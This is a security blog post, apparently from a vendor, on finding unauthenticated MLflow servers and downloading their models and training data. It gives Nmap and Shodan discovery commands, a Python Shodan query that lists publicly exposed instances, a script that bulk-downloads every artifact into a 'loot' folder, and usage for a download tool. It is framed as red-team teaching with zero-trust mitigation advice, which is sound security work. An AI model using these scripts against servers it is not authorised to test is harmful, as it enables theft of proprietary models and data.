
Hacking AI: Steal Models from MLflow, No Exploit Needed

No Authentication Can Lead To Problems

  • MLflow ships with no authentication out of the box, which lets any user access every other user's models and data
  • Red teamers can use our utility below to show organizations the weaknesses in their AI infrastructure

ML and AI models are valuable intellectual property for businesses, but security teams are often unaware of how to help companies protect these assets because there are few tools for pen-testing ML systems.

This post provides a method for red teamers and pen-testers to "access" and "steal" valuable AI models, which can be worth millions.

One popular tool used in many ML systems is MLflow, which sees over 13 million downloads per month. This blog is intended to teach pen-testers, red teamers, and ethical hackers one way to demonstrate, and ultimately help prevent, the breach of AI models, without exploiting either of the two MLflow CVEs recently discovered by Protect AI.

It should be noted that MLflow is not unique in its vulnerabilities; it is just one case study in an OSS ML supply chain that has endemic, structural challenges relating to security best practices. Let's begin penetration testing of an ML pipeline.


Surfacing MLflow Servers

AI models are often stored in model repositories. One of the most popular tools used to build model repositories is MLflow, which offers a simple web interface and programmatic API to view, store, and run models.

Nmap and other network scanning tools do not currently identify MLflow service fingerprints (although Protect AI has submitted one to the maintainers). As such, one way to identify MLflow services on a network is to use a tool such as https://github.com/FortyNorthSecurity/EyeWitness to collect a screenshot of every webserver on the network. A typical MLflow web user interface will look something like this:

[Screenshot: MLflow web UI home page]
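EyeWitness gives you screenshots to eyeball. If you only want to flag which of the discovered webservers answer with an MLflow page, a quick title check works too. The sketch below is a minimal, hypothetical example using Python's requests library; the candidate hosts are placeholders you would take from your own scan:

# Minimal sketch: flag webservers whose landing page carries the MLflow title.
# The candidate URLs below are placeholders from an earlier network scan.
import requests

candidates = ["http://192.168.0.10:5000", "http://192.168.0.42:5000"]

for url in candidates:
    try:
        resp = requests.get(url, timeout=5)
    except requests.RequestException:
        continue
    if "<title>MLflow</title>" in resp.text:
        print(f"Likely MLflow server: {url}")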

Another technique for finding MLflow servers is to run an Nmap scan of the network with service fingerprinting enabled and save the output to a file:

nmap -sV -oX nmapscan.xml 192.168.0.0/24

Next, search the output file (nmapscan.xml) for <title>MLflow</title> and you’ll find the MLflow servers.
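If you would rather script that search, here is a minimal sketch using Python's standard library. It simply flags any scanned host whose Nmap XML output mentions MLflow; exactly where the title string appears in the XML depends on which scan and script options you used:

# Minimal sketch: print addresses of hosts in an Nmap XML scan whose output mentions MLflow.
import xml.etree.ElementTree as ET

tree = ET.parse("nmapscan.xml")
for host in tree.getroot().iter("host"):
    address = host.find("address")
    if address is not None and "MLflow" in ET.tostring(host, encoding="unicode"):
        print(address.get("addr"))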

One way to understand if your organization is publicly exposed is to execute a search on shodan.io with the query http.html:MLflow.

[Screenshot: Shodan search results]
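The same query can be run programmatically with Shodan's official Python client (pip install shodan). This is a minimal sketch and assumes you have a Shodan API key; the key below is a placeholder:

# Minimal sketch: count and list publicly exposed MLflow instances via the Shodan API.
import shodan

api = shodan.Shodan("YOUR_API_KEY")  # placeholder API key
results = api.search("http.html:MLflow")  # same query as above

print(f"Publicly exposed MLflow instances: {results['total']}")
for match in results["matches"][:10]:  # first few results
    print(match["ip_str"], match["port"])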


The Shodan trends page shows the ever-increasing popularity of MLflow.


[Screenshot: Shodan trends page for MLflow]

Accessing Models and Data

By default there is no authentication on MLflow servers, and there is no built-in way of adding authentication within the application. Putting the MLflow server behind a firewall on the internal network isn't sufficient either, because a single successful phishing attack can get an attacker inside the perimeter.

Zero trust security would help solve this problem by adding fine-grained authentication and authorization, along with artifact attestation and provenance so you know when artifacts have been changed. However, most of the AI engineering world has yet to embrace zero trust security: the idea that users should be explicitly granted permission to access objects rather than everyone having full permissions by default. (This is a focus of Protect AI, and we will be detailing more about it in the future.)

For a red teamer, the most attractive part of MLflow is the ability to remotely download trained models that could be fundamental to the operation of an organization.

How does one do this using a default MLflow installation?

Click any run listed under the "Run Name" column, which brings you to that run's details. Then click Artifacts, click the model within Artifacts, and click the download button on the right.

[Screenshot: downloading a model artifact from the MLflow UI]

You have remotely "stolen" an organization’s AI models.

If the data used to train the model is also stored in the repository, you can download that data as well. Other interesting tidbits in the web UI include full local file paths and paths to S3 buckets, which can be explored further for sensitive information and artifacts, particularly when security best practices such as encryption are not enabled by default.
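Everything the web UI exposes is also reachable through MLflow's documented Python client, which is what makes bulk collection easy to script. The sketch below is a minimal, illustrative walk of every experiment, run, and artifact on a server; the tracking URI is a placeholder, and the API calls assume a recent MLflow 2.x client:

# Minimal sketch: enumerate and download every artifact on an unauthenticated MLflow server.
import os
import mlflow
from mlflow.tracking import MlflowClient

mlflow.set_tracking_uri("http://1.2.3.4:5000")  # placeholder target; no credentials needed by default
client = MlflowClient()
os.makedirs("./loot", exist_ok=True)  # local destination for downloaded artifacts

for experiment in client.search_experiments():
    for run in client.search_runs(experiment_ids=[experiment.experiment_id]):
        run_id = run.info.run_id
        for artifact in client.list_artifacts(run_id):
            local_path = mlflow.artifacts.download_artifacts(
                run_id=run_id, artifact_path=artifact.path, dst_path="./loot"
            )
            print(f"{run_id}: {artifact.path} -> {local_path}")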

Scripting the Process

Protecting any system begins with understanding where it's vulnerable. In that spirit, while a pen tester or red teamer could use the MLflow programmatic API to download artifacts from remote MLflow instances without authentication (as sketched above), we've sped up the process with a tool named DLflow, part of our Snaike-MLflow suite of security tools, to help further secure MLflow systems. You can download those tools here:

https://github.com/protectai/Snaike-MLflow

DLflow downloads all artifacts found on an MLflow server via asynchronous requests and requires less ML coding knowledge, allowing nearly any penetration testing team to help its organization better secure its ML tool stack. Simple instructions for use follow:

Installation

git clone https://github.com/protectai/Snaike-MLflow
cd Snaike-MLflow/DLflow
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt

Usage

From an Nmap XML file:

nmap -sV 1.2.3.4/24 -oX /path/to/nmapscan.xml
python DLflow.py -f /path/to/nmapscan.xml

For a specific server:

python DLflow.py -s http://1.2.3.4:5000


Problem One is Zero Trust

Developers in fast-paced emerging tech fields like AI often cut corners on security, but prevention is better than cure. For ML systems and AI applications, Zero Trust Architecture, combined with a solid understanding of every component that makes up a tool or network (including MLflow), provides a security framework that assumes no device, user, or network component should be trusted by default and that all interactions must be authenticated and authorized. It follows the principle of "never trust, always verify," which reduces the risk of security breaches and data leaks by compartmentalizing access to data and systems.

Zero Trust Architecture includes features such as fine-grained authorization and artifact attestation, which provide more control and accountability in the machine learning lifecycle. By embracing Zero Trust Architecture in their AI environments, organizations can establish a secure and reliable foundation for their ML systems and AI applications. Let's prioritize security and prevent potential disasters!